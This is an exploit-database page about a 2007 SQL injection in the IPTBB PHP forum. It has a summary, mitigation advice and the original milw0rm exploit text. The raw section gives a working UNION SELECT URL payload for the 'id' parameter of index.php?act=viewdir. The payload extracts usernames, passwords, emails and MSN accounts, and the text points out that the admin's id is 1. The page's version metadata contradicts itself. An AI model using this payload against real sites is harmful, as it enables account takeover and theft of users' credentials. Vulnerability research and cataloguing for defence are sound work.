header-logo
Suggest Exploit
vendor:
IPTBB
by:
MhZ91
7.5
CVSS
HIGH
Remote Sql Injection
89
CWE
Product Name: IPTBB
Affected Version From: 0.5.0
Affected Version To: 2000.5.4
Patch Exists: NO
Related CWE:
CPE: a:iptbb_project:iptbb:0.5.4
Metasploit:
Other Scripts:
Platforms Tested:
2007

IPTBB <= 0.5.4 Remote Sql Injection

The IPTBB forum system built using PHP and MySQL is vulnerable to remote SQL injection. By manipulating the 'id' parameter in the 'viewdir' action of the 'index.php' file, an attacker can execute arbitrary SQL queries. The exploit allows an attacker to retrieve sensitive information such as usernames, passwords, email addresses, and MSN accounts from the 'iptbb_users' table. The default admin id is 1, but any user id can be targeted.

Mitigation:

To mitigate the vulnerability, it is recommended to apply the latest patch or upgrade to a newer version of IPTBB. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                          
---------------------------------------------------------------

Http://www.inj3ct-it.org        Staff[at]inj3ct-it[dot]org   

---------------------------------------------------------------

          Remote Sql Injection

---------------------------------------------------------------

# Author: MhZ91
# Title: IPTBB <= 0.5.4 Remote Sql Injection
# Download: http://sourceforge.net/projects/iptbb/
# Bug: Remote Sql Injection
# Info: IPTBB is a free forum system built using PHP and mysql.
# Visit: http://www.inj3ct-it.org

---------------------------------------------------------------

http://[site]/index.php?act=viewdir&id='+union+select+1,concat(username,char(58),password,char(58),email,char(58),msn)+from+iptbb_users+where+id=[UserID]/*

Change [UserID] whit id of member u want get user and password ( the default id of the admin is 1 ) .

In the admincp.php , in general settings, u can insert a html code for redirect .

---------------------------------------------------------------

# milw0rm.com [2007-12-31]

Navigation

Suggest Exploit

Services By CQR